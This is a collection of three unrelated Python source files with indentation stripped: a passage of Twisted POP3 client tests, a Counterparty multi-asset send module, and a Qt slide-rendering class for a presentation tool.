directlyProvides(t, interfaces.ISSLTransport)
p.dataReceived("+OK Howdy\r\n")
d = p.login("username", "password")
self.assertEqual(t.value(), "USER username\r\n")
t.clear()
p.dataReceived("+OK\r\n")
self.assertEqual(t.value(), "PASS password\r\n")
p.dataReceived("+OK\r\n")
return d
class ListConsumer:
def __init__(self):
self.data = {}
def consume(self, (item, value)):
self.data.setdefault(item, []).append(value)
class MessageConsumer:
def __init__(self):
self.data = []
def consume(self, line):
self.data.append(line)
class POP3ClientListTests(unittest.TestCase):
def testListSize(self):
p, t = setUp()
d = p.listSize()
self.assertEqual(t.value(), "LIST\r\n")
p.dataReceived("+OK Here it comes\r\n")
p.dataReceived("1 3\r\n2 2\r\n3 1\r\n.\r\n")
return d.addCallback(self.assertEqual, [3, 2, 1])
def testListSizeWithConsumer(self):
p, t = setUp()
c = ListConsumer()
f = c.consume
d = p.listSize(f)
self.assertEqual(t.value(), "LIST\r\n")
p.dataReceived("+OK Here it comes\r\n")
p.dataReceived("1 3\r\n2 2\r\n3 1\r\n")
self.assertEqual(c.data, {0: [3], 1: [2], 2: [1]})
p.dataReceived("5 3\r\n6 2\r\n7 1\r\n")
self.assertEqual(c.data, {0: [3], 1: [2], 2: [1], 4: [3], 5: [2], 6: [1]})
p.dataReceived(".\r\n")
return d.addCallback(self.assertIdentical, f)
def testFailedListSize(self):
p, t = setUp()
d = p.listSize()
self.assertEqual(t.value(), "LIST\r\n")
p.dataReceived("-ERR Fatal doom server exploded\r\n")
return self.assertFailure(
d, ServerErrorResponse).addCallback(
lambda exc: self.assertEqual(exc.args[0], "Fatal doom server exploded"))
def testListUID(self):
p, t = setUp()
d = p.listUID()
self.assertEqual(t.value(), "UIDL\r\n")
p.dataReceived("+OK Here it comes\r\n")
p.dataReceived("1 abc\r\n2 def\r\n3 ghi\r\n.\r\n")
return d.addCallback(self.assertEqual, ["abc", "def", "ghi"])
def testListUIDWithConsumer(self):
p, t = setUp()
c = ListConsumer()
f = c.consume
d = p.listUID(f)
self.assertEqual(t.value(), "UIDL\r\n")
p.dataReceived("+OK Here it comes\r\n")
p.dataReceived("1 xyz\r\n2 abc\r\n5 mno\r\n")
self.assertEqual(c.data, {0: ["xyz"], 1: ["abc"], 4: ["mno"]})
p.dataReceived(".\r\n")
return d.addCallback(self.assertIdentical, f)
def testFailedListUID(self):
p, t = setUp()
d = p.listUID()
self.assertEqual(t.value(), "UIDL\r\n")
p.dataReceived("-ERR Fatal doom server exploded\r\n")
return self.assertFailure(
d, ServerErrorResponse).addCallback(
lambda exc: self.assertEqual(exc.args[0], "Fatal doom server exploded"))
class POP3ClientMessageTests(unittest.TestCase):
def testRetrieve(self):
p, t = setUp()
d = p.retrieve(7)
self.assertEqual(t.value(), "RETR 8\r\n")
p.dataReceived("+OK Message incoming\r\n")
p.dataReceived("La la la here is message text\r\n")
p.dataReceived("..Further message text tra la la\r\n")
p.dataReceived(".\r\n")
return d.addCallback(
self.assertEqual,
["La la la here is message text",
".Further message text tra la la"])
def testRetrieveWithConsumer(self):
p, t = setUp()
c = MessageConsumer()
f = c.consume
d = p.retrieve(7, f)
self.assertEqual(t.value(), "RETR 8\r\n")
p.dataReceived("+OK Message incoming\r\n")
p.dataReceived("La la la here is message text\r\n")
p.dataReceived("..Further message text\r\n.\r\n")
return d.addCallback(self._cbTestRetrieveWithConsumer, f, c)
def _cbTestRetrieveWithConsumer(self, result, f, c):
self.assertIdentical(result, f)
self.assertEqual(c.data, ["La la la here is message text",
".Further message text"])
def testPartialRetrieve(self):
p, t = setUp()
d = p.retrieve(7, lines=2)
self.assertEqual(t.value(), "TOP 8 2\r\n")
p.dataReceived("+OK 2 lines on the way\r\n")
p.dataReceived("Line the first! Woop\r\n")
p.dataReceived("Line the last! Bye\r\n")
p.dataReceived(".\r\n")
return d.addCallback(
self.assertEqual,
["Line the first! Woop",
"Line the last! Bye"])
def testPartialRetrieveWithConsumer(self):
p, t = setUp()
c = MessageConsumer()
f = c.consume
d = p.retrieve(7, f, lines=2)
self.assertEqual(t.value(), "TOP 8 2\r\n")
p.dataReceived("+OK 2 lines on the way\r\n")
p.dataReceived("Line the first! Woop\r\n")
p.dataReceived("Line the last! Bye\r\n")
p.dataReceived(".\r\n")
return d.addCallback(self._cbTestPartialRetrieveWithConsumer, f, c)
def _cbTestPartialRetrieveWithConsumer(self, result, f, c):
self.assertIdentical(result, f)
self.assertEqual(c.data, ["Line the first! Woop",
"Line the last! Bye"])
def testFailedRetrieve(self):
p, t = setUp()
d = p.retrieve(0)
self.assertEqual(t.value(), "RETR 1\r\n")
p.dataReceived("-ERR Fatal doom server exploded\r\n")
return self.assertFailure(
d, ServerErrorResponse).addCallback(
lambda exc: self.assertEqual(exc.args[0], "Fatal doom server exploded"))
def test_concurrentRetrieves(self):
"""
Issue three retrieve calls immediately without waiting for any to
succeed and make sure they all do succeed eventually.
"""
p, t = setUp()
messages = [
p.retrieve(i).addCallback(
self.assertEqual,
["First line of %d." % (i + 1,),
"Second line of %d." % (i + 1,)])
for i
in range(3)]
for i in range(1, 4):
self.assertEqual(t.value(), "RETR %d\r\n" % (i,))
t.clear()
p.dataReceived("+OK 2 lines on the way\r\n")
p.dataReceived("First line of %d.\r\n" % (i,))
p.dataReceived("Second line of %d.\r\n" % (i,))
self.assertEqual(t.value(), "")
p.dataReceived(".\r\n")
return defer.DeferredList(messages, fireOnOneErrback=True)
class POP3ClientMiscTests(unittest.TestCase):
def testCapability(self):
p, t = setUp()
d = p.capabilities(useCache=0)
self.assertEqual(t.value(), "CAPA\r\n")
p.dataReceived("+OK Capabilities on the way\r\n")
p.dataReceived("X\r\nY\r\nZ\r\nA 1 2 3\r\nB 1 2\r\nC 1\r\n.\r\n")
return d.addCallback(
self.assertEqual,
{"X": None, "Y": None, "Z": None,
"A": ["1", "2", "3"],
"B": ["1", "2"],
"C": ["1"]})
def testCapabilityError(self):
p, t = setUp()
d = p.capabilities(useCache=0)
self.assertEqual(t.value(), "CAPA\r\n")
p.dataReceived("-ERR This server is lame!\r\n")
return d.addCallback(self.assertEqual, {})
def testStat(self):
p, t = setUp()
d = p.stat()
self.assertEqual(t.value(), "STAT\r\n")
p.dataReceived("+OK 1 1212\r\n")
return d.addCallback(self.assertEqual, (1, 1212))
def testStatError(self):
p, t = setUp()
d = p.stat()
self.assertEqual(t.value(), "STAT\r\n")
p.dataReceived("-ERR This server is lame!\r\n")
return self.assertFailure(
d, ServerErrorResponse).addCallback(
lambda exc: self.assertEqual(exc.args[0], "This server is lame!"))
def testNoop(self):
p, t = setUp()
d = p.noop()
self.assertEqual(t.value(), "NOOP\r\n")
p.dataReceived("+OK No-op to you too!\r\n")
return d.addCallback(self.assertEqual, "No-op to you too!")
def testNoopError(self):
p, t = setUp()
d = p.noop()
self.assertEqual(t.value(), "NOOP\r\n")
p.dataReceived("-ERR This server is lame!\r\n")
return self.assertFailure(
d, ServerErrorResponse).addCallback(
lambda exc: self.assertEqual(exc.args[0], "This server is lame!"))
def testRset(self):
p, t = setUp()
d = p.reset()
self.assertEqual(t.value(), "RSET\r\n")
p.dataReceived("+OK Reset state\r\n")
return d.addCallback(self.assertEqual, "Reset state")
def testRsetError(self):
p, t = setUp()
d = p.reset()
self.assertEqual(t.value(), "RSET\r\n")
p.dataReceived("-ERR This server is lame!\r\n")
return self.assertFailure(
d, ServerErrorResponse).addCallback(
lambda exc: self.assertEqual(exc.args[0], "This server is lame!"))
def testDelete(self):
p, t = setUp()
d = p.delete(3)
self.assertEqual(t.value(), "DELE 4\r\n")
p.dataReceived("+OK Hasta la vista\r\n")
return d.addCallback(self.assertEqual, "Hasta la vista")
def testDeleteError(self):
p, t = setUp()
d = p.delete(3)
self.assertEqual(t.value(), "DELE 4\r\n")
p.dataReceived("-ERR Winner is not you.\r\n")
return self.assertFailure(
d, ServerErrorResponse).addCallback(
lambda exc: self.assertEqual(exc.args[0], "Winner is not you."))
class SimpleClient(POP3Client):
def __init__(self, deferred, contextFactory = None):
self.deferred = deferred
self.allowInsecureLogin = True
def serverGreeting(self, challenge):
self.deferred.callback(None)
class POP3HelperMixin:
serverCTX = None
clientCTX = None
def setUp(self):
d = defer.Deferred()
self.server = pop3testserver.POP3TestServer(contextFactory=self.serverCTX)
self.client = SimpleClient(d, contextFactory=self.clientCTX)
self.client.timeout = 30
self.connected = d
def tearDown(self):
del self.server
del self.client
del self.connected
def _cbStopClient(self, ignore):
self.client.transport.loseConnection()
def _ebGeneral(self, failure):
self.client.transport.loseConnection()
self.server.transport.loseConnection()
return failure
def loopback(self):
return loopback.loopbackTCP(self.server, self.client, noisy=False)
class TLSServerFactory(protocol.ServerFactory):
class protocol(basic.LineReceiver):
context = None
output = []
def connectionMade(self):
self.factory.input = []
self.output = self.output[:]
map(self.sendLine, self.output.pop(0))
def lineReceived(self, line):
self.factory.input.append(line)
map(self.sendLine, self.output.pop(0))
if line == 'STLS':
self.transport.startTLS(self.context)
class POP3TLSTests(unittest.TestCase):
"""
Tests for POP3Client's support for TLS connections.
"""
def test_startTLS(self):
"""
POP3Client.startTLS starts a TLS session over its existing TCP
connection.
"""
sf = TLSServerFactory()
sf.protocol.output = [
['+OK'], # Server greeting
['+OK', 'STLS', '.'], # CAPA response
['+OK'], # STLS response
['+OK', '.'], # Second CAPA response
['+OK'] # QUIT response
]
sf.protocol.context = ServerTLSContext()
port = reactor.listenTCP(0, sf, interface='127.0.0.1')
self.addCleanup(port.stopListening)
H = port.getHost().host
P = port.getHost().port
connLostDeferred = defer.Deferred()
cp = SimpleClient(defer.Deferred(), ClientTLSContext())
def connectionLost(reason):
SimpleClient.connectionLost(cp, reason)
connLostDeferred.callback(None)
cp.connectionLost = connectionLost
cf = protocol.ClientFactory()
cf.protocol = lambda: cp
conn = reactor.connectTCP(H, P, cf)
def cbConnected(ignored):
log.msg("Connected to server; starting TLS")
return cp.startTLS()
def cbStartedTLS(ignored):
log.msg("Started TLS; disconnecting")
return cp.quit()
def cbDisconnected(ign):
log.msg("Disconnected; asserting correct input received")
self.assertEqual(
sf.input,
['CAPA', 'STLS', 'CAPA', 'QUIT'])
def cleanup(result):
log.msg("Asserted correct input; disconnecting client and shutting down server")
conn.disconnect()
return connLostDeferred
cp.deferred.addCallback(cbConnected)
cp.deferred.addCallback(cbStartedTLS)
cp.deferred.addCallback(cbDisconnected)
cp.deferred.addBoth(cleanup)
return cp.deferred
class POP3TimeoutTests(POP3HelperMixin, unittest.TestCase):
def testTimeout(self):
def login():
d = self.client.login('test', 'twisted')
d.addCallback(loggedIn)
d.addErrback(timedOut)
return d
def loggedIn(result):
self.fail("Successfully logged in!? Impossible!")
def timedOut(failure):
failure.trap(error.TimeoutError)
self._cbStopClient(None)
def quit():
return self.client.quit()
self.client.timeout = 0.01
# Tell the server to not return a response to client. This
# will trigger a timeout.
pop3testserver.TIMEOUT_RESPONSE = True
methods = [login, quit]
map(self.connected.addCallback, map(strip, methods))
self.connected.addCallback(self._cbStopClient)
self.connected.addErrback(self._ebGeneral)
return self.loopback()
if ClientTLSContext is None:
for case in (POP3TLSTests,):
case.skip = "OpenSSL not present"
elif interfaces.IReactorSSL(reactor, None) is None:
for case in (POP3TLSTests,):
case.skip = "Reactor doesn't support SSL"
import twisted.mail.pop3client
class POP3ClientModuleStructureTests(unittest.TestCase):
"""
Miscellaneous tests more to do with module/package structure than
anything to do with the POP3 client.
"""
def test_all(self):
"""
twisted.mail.pop3client.__all__ should be empty because all classes
should be imported through twisted.mail.pop3.
"""
self.assertEqual(twisted.mail.pop3client.__all__, [])
def test_import(self):
"""
Every public class in twisted.mail.pop3client should be available as a
member of twisted.mail.pop3 with the exception of
twisted.mail.pop3client.POP3Client which should be available as
twisted.mail.pop3.AdvancedClient.
"""
publicClasses = [c[0] for c in inspect.getmembers(
sys.modules['twisted.mail.pop3client'],
inspect.isclass)
if not c[0][0] == '_']
for pc in publicClasses:
if not pc == 'POP3Client':
self.failUnless(hasattr(twisted.mail.pop3, pc))
else:
self.failUnless(hasattr(twisted.mail.pop3,
'AdvancedPOP3Client'))
|
|
#! /usr/bin/python3
import struct
import json
import logging
import binascii
import math
from bitcoin.core import key
from functools import reduce
from itertools import groupby
logger = logging.getLogger(__name__)
from bitstring import ReadError
from counterpartylib.lib import (config, util, exceptions, util, message_type, address)
from .mpma_util.internals import (_decode_mpmaSendDecode, _encode_mpmaSend)
ID = 3 # 0x03 is this specific message type
## expected functions for message version
def unpack(db, message, block_index):
try:
unpacked = _decode_mpmaSendDecode(message, block_index)
except (struct.error) as e:
raise exceptions.UnpackError('could not unpack')
except (exceptions.AssetNameError, exceptions.AssetIDError) as e:
raise exceptions.UnpackError('invalid asset in mpma send')
except (ReadError) as e:
raise exceptions.UnpackError('truncated data')
return unpacked
def validate (db, source, asset_dest_quant_list, block_index):
problems = []
if len(asset_dest_quant_list) == 0:
problems.append('send list cannot be empty')
if len(asset_dest_quant_list) == 1:
problems.append('send list cannot have only one element')
if len(asset_dest_quant_list) > 0:
# Need to manually unpack the tuple to avoid errors on scenarios where no memo is specified
grpd = groupby([(t[0], t[1]) for t in asset_dest_quant_list])
lengrps = [len(list(grpr)) for (group, grpr) in grpd]
cardinality = max(lengrps)
if cardinality > 1:
problems.append('cannot specify more than once a destination per asset')
cursor = db.cursor()
for t in asset_dest_quant_list:
# Need to manually unpack the tuple to avoid errors on scenarios where no memo is specified
asset = t[0]
destination = t[1]
quantity = t[2]
sendMemo = None
if len(t) > 3:
sendMemo = t[3]
if asset == config.BTC: problems.append('cannot send {} to {}'.format(config.BTC, destination))
if not isinstance(quantity, int):
problems.append('quantities must be an int (in satoshis) for {} to {}'.format(asset, destination))
if quantity < 0:
problems.append('negative quantity for {} to {}'.format(asset, destination))
if quantity == 0:
problems.append('zero quantity for {} to {}'.format(asset, destination))
# For SQLite3
if quantity > config.MAX_INT:
problems.append('integer overflow for {} to {}'.format(asset, destination))
# destination is always required
if not destination:
problems.append('destination is required for {}'.format(asset))
if util.enabled('options_require_memo'):
results = cursor.execute('SELECT options FROM addresses WHERE address=?', (destination,))
if results:
result = results.fetchone()
if result and result['options'] & config.ADDRESS_OPTION_REQUIRE_MEMO and (sendMemo is None):
problems.append('destination {} requires memo'.format(destination))
cursor.close()
return problems
def compose (db, source, asset_dest_quant_list, memo, memo_is_hex):
cursor = db.cursor()
out_balances = util.accumulate([(t[0], t[2]) for t in asset_dest_quant_list])
for (asset, quantity) in out_balances:
if util.enabled('mpma_subasset_support'):
# resolve subassets
asset = util.resolve_subasset_longname(db, asset)
if not isinstance(quantity, int):
raise exceptions.ComposeError('quantities must be an int (in satoshis) for {}'.format(asset))
balances = list(cursor.execute('''SELECT * FROM balances WHERE (address = ? AND asset = ?)''', (source, asset)))
if not balances or balances[0]['quantity'] < quantity:
raise exceptions.ComposeError('insufficient funds for {}'.format(asset))
block_index = util.CURRENT_BLOCK_INDEX
cursor.close()
problems = validate(db, source, asset_dest_quant_list, block_index)
if problems: raise exceptions.ComposeError(problems)
data = message_type.pack(ID)
data += _encode_mpmaSend(db, asset_dest_quant_list, block_index, memo=memo, memo_is_hex=memo_is_hex)
return (source, [], data)
def parse (db, tx, message):
try:
unpacked = unpack(db, message, tx['block_index'])
status = 'valid'
except (struct.error) as e:
status = 'invalid: truncated message'
except (exceptions.AssetNameError, exceptions.AssetIDError) as e:
status = 'invalid: invalid asset name/id'
except (Exception) as e:
status = 'invalid: couldn\'t unpack; %s' % e
cursor = db.cursor()
plain_sends = []
all_debits = []
all_credits = []
if status == 'valid':
for asset_id in unpacked:
try:
asset = util.get_asset_name(db, asset_id, tx['block_index'])
except (exceptions.AssetNameError) as e:
status = 'invalid: asset %s invalid at block index %i' % (asset_id, tx['block_index'])
break
cursor.execute('''SELECT * FROM balances \
WHERE (address = ? AND asset = ?)''', (tx['source'], asset_id))
balances = cursor.fetchall()
if not balances:
status = 'invalid: insufficient funds for asset %s, address %s has no balance' % (asset_id, tx['source'])
break
credits = unpacked[asset_id]
total_sent = reduce(lambda p, t: p + t[1], credits, 0)
if balances[0]['quantity'] < total_sent:
status = 'invalid: insufficient funds for asset %s, needs %i' % (asset_id, total_sent)
break
if status == 'valid':
plain_sends += map(lambda t: util.py34TupleAppend(asset_id, t), credits)
all_credits += map(lambda t: {"asset": asset_id, "destination": t[0], "quantity": t[1]}, credits)
all_debits.append({"asset": asset_id, "quantity": total_sent})
if status == 'valid':
problems = validate(db, tx['source'], plain_sends, tx['block_index'])
if problems: status = 'invalid:' + '; '.join(problems)
if status == 'valid':
for op in all_credits:
util.credit(db, op['destination'], op['asset'], op['quantity'], action='mpma send', event=tx['tx_hash'])
for op in all_debits:
util.debit(db, tx['source'], op['asset'], op['quantity'], action='mpma send', event=tx['tx_hash'])
# Enumeration of the plain sends needs to be deterministic, so we sort them by asset and then by address
plain_sends = sorted(plain_sends, key=lambda x: ''.join([x[0], x[1]]))
for i, op in enumerate(plain_sends):
if len(op) > 3:
memo_bytes = op[3]
else:
memo_bytes = None
bindings = {
'tx_index': tx['tx_index'],
'tx_hash': tx['tx_hash'],
'block_index': tx['block_index'],
'source': tx['source'],
'asset': op[0],
'destination': op[1],
'quantity': op[2],
'status': status,
'memo': memo_bytes,
'msg_index': i
}
sql = 'insert into sends (tx_index, tx_hash, block_index, source, destination, asset, quantity, status, memo, msg_index) values(:tx_index, :tx_hash, :block_index, :source, :destination, :asset, :quantity, :status, :memo, :msg_index)'
cursor.execute(sql, bindings)
if status != 'valid':
logger.warn("Not storing [mpma] tx [%s]: %s" % (tx['tx_hash'], status))
cursor.close()
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
|
from time import sleep
import string
from PresentationObject import PresentationObject
from waitevent import waitevent
from qt import *
from qtcanvas import *
true = success = done = 1
false = failure = incomplete = 0
class slide( PresentationObject ):
"""
<slide> is used to show objects on one "page" of a presentation.
<p>
<b>Properties:</b>
<ul>
<li>
<i>background</i>: location of the image file on disk. It can be
relative to the location of the XML file or absolute to the
current file system. i.e., "imgName.gif", "img/imgName.gif",
"../imgName.gif", "/home/dmacd/presenter/examples/1/imgName.gif"
</li>
<li>
<i>stretchbackground</i>: "yes" to scale the background image to
fill the slide display. Otherwise, the background image will be
drawn to its actual size and tiled if isn't big enough to fill the
display.
</li>
<li>
<i>bgcolor</i>/<i>bgcolour</i>: background colour for the slide.
If the <i>background</i> property is used, this property is
overridden.
</li>
<li>
<i>margintop</i>/<i>marginbottom</i>/<i>marginleft</i>/
<i>marginright</i>: number of pixels to separate slide content from
the edge of the display. The <i>margin</i> property can be used
as the value for all four sides.
</li>
<li>
<i>title</i>: name for this slide which will show in the
"Go to Slide" dialog and may be used by the
<a href="title.html"><title></a> tag within a slide.
</li>
<li>
<i>transition</i>: refresh type when making a transition from
another slide. Possible values are "blindleft", "blindright",
"blindtop", "blindbottom", "center"/"centre", "spiral", "dissolve"
and "immediate" (which is the default).
</li>
<li>
<i>transitiondelay</i>, number of seconds to wait between
refreshes for the transition. The value should be in a decimal
place down to milliseconds. For example: 0.05
</li>
<li>
<i>displaynumber</i>, choose whether to display the slide number
at the bottom of the display. Possible values are "true"/"yes" or
"false"/"no"
</li>
<li>
<i>displaynumberof</i>, choose whether to display the number of
slides in the presentation at the bottom of the display when the
slide number is displayed. Possible values are "true"/"yes" or
"false"/"no". This option will only work if <i>displaynumber</i>
is "true"/"yes".
</li>
</ul>
"""
def __init__( self, *args ):
"""
Initiate the container, contents, and properties.
"""
apply( PresentationObject.__init__, (self,) + args )
def render( self, app, x, y ):
"""
Draw all PresentationObject instances within this slide.
"""
self.showBackground()
self.initAnimated()
self.setRenderHeight(0)
self.setFontHeight(0)
for content in self.getContents():
if isinstance(content, PresentationObject):
x, y = content.render( app, x, y )
else:
from font import font
text = font( self,
[content],
self.getProperties() )
i = self.getContents().index( content )
self.getContents()[i] = text
x, y = text.render( app, x, y )
#
# Draw any underlines for text in the slide.
#
for content in self.getContents():
if isinstance(content, PresentationObject):
content.drawUnderlines( app )
self.displaySlideNumber( app )
self.initAnimatedRefresh()
self.findAnimatedRefresh( self.getContents() )
return x, y
def displaySlideNumber( self, app ):
"""
Display this slide's number at the bottom of the display.
"""
#
# If a QCanvasText object for the slide number already exists,
# delete it from memory.
#
if self.getSlideNum() != None:
self.getSlideNum().setCanvas( QCanvas() )
self.setSlideNum( None )
#
# If chosen, display the slide number.
#
if self.getProperty("displaynumber") == "true" or \
self.getProperty("displaynumber") == "yes" or \
app.getConfig().displaySlideNumber:
num = "%d" % app.getSlideshow().getSlideNum()
#
#
#
if self.getProperty("displaynumberof") == "true" or \
self.getProperty("displaynumberof") == "yes" or \
app.getConfig().displaySlideNumberOf:
num = "%s of %d" % \
(num, app.getSlideshow().getNumSlides())
from font import font
qFont = font( self ).getFont( app.getHeight() )
qColor = QColor( self.getProperty("color") )
qCanvas = self.getCanvas()
self.setSlideNum( QCanvasText(num, qFont, qCanvas) )
self.getSlideNum().setColor( qColor )
else:
self.setSlideNum( None )
return
x = self.getCentre() - \
( self.getSlideNum().boundingRect().width() / 2 )
y = app.getHeight() - self.getProperty( "marginbottom" )
if y + self.getSlideNum().boundingRect().height() > \
app.getHeight():
y = app.getHeight() - \
self.getSlideNum().boundingRect().height() - \
4
self.getSlideNum().move( x, y )
self.getSlideNum().show()
def setSlideNum( self, num ):
"""
Set the QCanvasText instance which shows slide number.
num, QCanvasText object.
"""
self.__num = num
def getSlideNum( self ):
"""
Get QCanvasText instance which shows slide number.
Returns a QCanvasText object. None is returned if the canvas
object hasn't been cached.
"""
try:
return self.__num
except AttributeError:
return None
def displayAnimationIcon( self ):
"""
"""
#
# Cache the icon if it hasn't been loaded into memory yet.
#
if self.getAnimationIcon() == None:
self.iconImg = QImage( "images/anim.png" )
if self.iconImg.isNull():
self.iconImg.create( 32, 32, 8, 256 )
self.iconImg.fill(0)
self.iconPix = QCanvasPixmap( self.iconImg )
#
# Constructor for Qt 2.*
#
try:
self.iconArray = \
QCanvasPixmapArray( [self.iconPix],
[QPoint(0, 0)] )
#
# Constructor for Qt 3.*+
#
except TypeError:
self.iconArray = QCanvasPixmapArray()
self.iconArray.setImage( 0, self.iconPix )
sprite = QCanvasSprite( self.iconArray,
self.getCanvas() )
self.setAnimationIcon( sprite )
x = self.getCanvas().width() - \
self.getAnimationIcon().boundingRect().width() - 4
y = self.getCanvas().height() - \
self.getAnimationIcon().boundingRect().height() - 4
self.getAnimationIcon().move( x, y )
self.getAnimationIcon().show()
def setAnimationIcon( self, icon ):
"""
Set the QCanvasSprite instance which shows the animation
available icon.
icon, QCanvasSprite object.
"""
self.__icon = icon
def getAnimationIcon( self ):
"""
Get QCanvasSprite instance which shows the animation
available icon.
Returns a QCanvasSprite object. None is returned if the canvas
object hasn't been cached.
"""
try:
return self.__icon
except AttributeError:
return None
def showBackground( self ):
"""
Display the background for this canvas. If the stretch option
has been enabled, resize the background image to the size of
the canvas. Otherwise, the image will tile if it's too small
for the canvas and be cut off if it's larger.
"""
#
# Get the full path to the image filename.
#
bgPath = self.getProperty( "background" )
if bgPath == None:
return
if len(bgPath) and bgPath[0] != "/":
dirName = self.getSlideshow().getDirName()
bgPath = "%s/%s" % ( dirName, bgPath )
stretch = self.getProperty( "stretchbackground" )
stretch = string.lower( stretch )
if stretch == "yes" or stretch == "true":
slideshow = self.getSlideshow()
width = self.getCanvas().width()
height = self.getCanvas().height()
bgPixmap = slideshow.getBackground( bgPath,
width,
height,
true )
else:
bgPixmap = self.getSlideshow().getBackground( bgPath )
#
# If the background image wasn't cached in <slideshow>, try
# to create a local copy here.
#
if bgPixmap == None:
bgImage = QImage( bgPath )
if not bgImage.isNull():
if stretch == "yes" or stretch == "true":
bgImage = bgImage.smoothScale(
self.getCanvas().width(),
self.getCanvas().height() )
bgPixmap = QPixmap()
bgPixmap.convertFromImage( bgImage )
#
# If the given background image was read successfully, display
# it in the canvas.
#
if bgPixmap != None:
self.getCanvas().setBackgroundPixmap( bgPixmap )
def setCanvas( self, canvas ):
"""
-canvas,
"""
self.__canvas = canvas
def getCanvas( self ):
"""
"""
try:
return self.__canvas
except AttributeError:
return None
def hasCanvas( self ):
"""
"""
return self.getCanvas() != None
def getCentre( self ):
"""
Returns the centre horizontal pixel of the current slide.
"""
centre = ( self.getCanvas().width() - \
self.getProperty("marginright") - \
self.getProperty("marginleft") ) / 2 + \
self.getProperty( "marginleft" )
return centre
def getCenter( self ):
"""
Alias for getCentre()
"""
return self.getCentre()
def getWidth( self ):
"""
The drawing width of the slide, which is the width of the
QCanvas minus the left and right margins.
"""
if self.hasCanvas():
return self.getCanvas().width() - \
self.getProperty( "marginleft" ) - \
self.getProperty( "marginright" )
else:
return 0
def getHeight( self ):
"""
The drawing height of the slide, which is the height of the
QCanvas minus the top and bottom margins.
"""
if self.hasCanvas():
return self.getCanvas().height() - \
self.getProperty( "margintop" ) - \
self.getProperty( "marginbottom" )
else:
return 0
def initAnimated( self ):
"""
Initialize the list for the slide's animated objects.
"""
self.__animated = []
def getAnimated( self ):
"""
Get the list for the slide's animated objects.
"""
return self.__animated
def hasNextAnimated( self ):
"""
Returns true if there's objects in the slide left to be
animated into view.
"""
if len(self.getAnimated()):
return true
else:
return false
def getNextAnimated( self ):
"""
Gets the next group of objects to animate into the slide.
"""
if not self.hasNextAnimated():
return []
else:
return self.getAnimated().pop(0)
def animateNext( self, app ):
"""
Animate into the slide the next group of objects.
Returns true if an object was animated or false if there are no
objects left to animate.
"""
didAnimation = false
objects = self.getNextAnimated()
while len(objects):
didAnimation = true
for obj in objects:
if self.animateAdvance(obj, app) == done:
objects.remove( obj )
#
# Hide the icon that indicates objects still available to
# animate into the slide if all objects in this slide have
# been displayed.
#
if not self.hasNextAnimated() and \
self.getAnimationIcon() != None:
self.getAnimationIcon().hide()
self.getCanvas().update()
return didAnimation
def animateAdvance( self, obj, app ):
"""
"""
animDir = obj["object"].getProperty( "animation" )
animSpeed = obj["object"].getProperty( "animationspeed" )
if animSpeed < 1:
animSpeed = 1
width = obj["object"].getWidth()
height = obj["object"].getHeight()
canvas = self.getCanvas()
if animDir == "left":
if self.objAtOrigin(obj):
x = animSpeed * -1
else:
x = obj["object"].x()
x = x + animSpeed
if x > obj["origX"]:
x = obj["origX"]
obj["object"].show( x, obj["origY"] )
canvas.update()
#
# If this object has completed it's animation, remove
# it from the animated list.
#
if x == obj["origX"]:
return done
elif animDir == "right":
if self.objAtOrigin(obj):
x = app.getWidth() - \
width + \
animSpeed
else:
x = obj["object"].x()
x = x - animSpeed
if x < obj["origX"]:
x = obj["origX"]
obj["object"].show( x, obj["origY"] )
canvas.update()
if x == obj["origX"]:
return done
elif animDir == "top":
if self.objAtOrigin(obj):
y = animSpeed * -1
else:
y = obj["object"].y()
y = y + animSpeed
if y > obj["origY"]:
y = obj["origY"]
obj["object"].show( obj["origX"], y )
canvas.update()
if y == obj["origY"]:
return done
elif animDir == "bottom":
if self.objAtOrigin(obj):
y = app.getHeight() - \
height + \
animSpeed
else:
y = obj["object"].y()
y = y - animSpeed
if y < obj["origY"]:
y = obj["origY"]
obj["object"].show( obj["origX"], y )
canvas.update()
if y == obj["origY"]:
return done
elif animDir == "topleft":
if self.objAtOrigin(obj):
if obj["object"].x() > obj["object"].y():
x = obj["object"].x() - \
obj["object"].y() - \
animSpeed
y = 0
else:
x = 0
y = obj["object"].y() - \
obj["object"].x() - \
animSpeed
else:
x = obj["object"].x()
y = obj["object"].y()
x = x + animSpeed
y = y + animSpeed
if x > obj["origX"] or y > obj["origY"]:
x = obj["origX"]
y = obj["origY"]
obj["object"].show( x, y )
canvas.update()
if x == obj["origX"] or y == obj["origY"]:
return done
elif animDir == "topright":
if self.objAtOrigin(obj):
x = obj["object"].x() + \
obj["object"].y() + \
animSpeed
y = animSpeed * -1
else:
x = obj["object"].x()
y = obj["object"].y()
x = x - animSpeed
y = y + animSpeed
if x < obj["origX"] or y > obj["origY"]:
x = obj["origX"]
y = obj["origY"]
obj["object"].show( x, y )
canvas.update()
if x == obj["origX"] and y == obj["origY"]:
return done
elif animDir == "bottomleft":
if self.objAtOrigin(obj):
bottomOfObj = obj["object"].y() + \
obj["object"].getHeight()
x = 0 - animSpeed
y = obj["object"].y() + \
obj["object"].x() + \
animSpeed
else:
x = obj["object"].x()
y = obj["object"].y()
x = x + animSpeed
y = y - animSpeed
if x > obj["origX"] or y < obj["origY"]:
x = obj["origX"]
y = obj["origY"]
obj["object"].show( x, y )
canvas.update()
if x == obj["origX"] and y == obj["origY"]:
return done
elif animDir == "bottomright":
if self.objAtOrigin(obj):
x = app.getWidth() - \
obj["object"].getWidth() + \
animSpeed
y = obj["object"].y() + \
app.getWidth() - \
obj["object"].x() - \
obj["object"].getWidth() + \
animSpeed
else:
x = obj["object"].x()
y = obj["object"].y()
x = x - animSpeed
y = y - animSpeed
if x < obj["origX"] or y < obj["origY"]:
x = obj["origX"]
y = obj["origY"]
obj["object"].show( x, y )
canvas.update()
if x == obj["origX"] and y == obj["origY"]:
return done
elif animDir == "hide":
obj["object"].show( obj["origX"], obj["origY"] )
canvas.update()
return done
else:
obj["object"].show( obj["origX"], obj["origY"] )
canvas.update()
return done
#
# If animdelay is set to pause before advancing the next
# animated object(s), sleep for the delay timeout.
#
animDelay = obj["object"].getProperty( "animationdelay" )
if animDelay > 0:
import time
time.sleep( animDelay )
return incomplete
def objAtOrigin( self, obj ):
"""
"""
return obj["object"].x() == obj["origX"] and \
obj["object"].y() == obj["origY"]
def initAnimatedRefresh( self ):
"""
"""
self.__animatedRefresh = []
def getAnimatedRefresh( self ):
"""
"""
return self.__animatedRefresh
def hasAnimatedRefresh( self ):
"""
"""
try:
return len(self.__animatedRefresh)
except AttributeError:
return 0
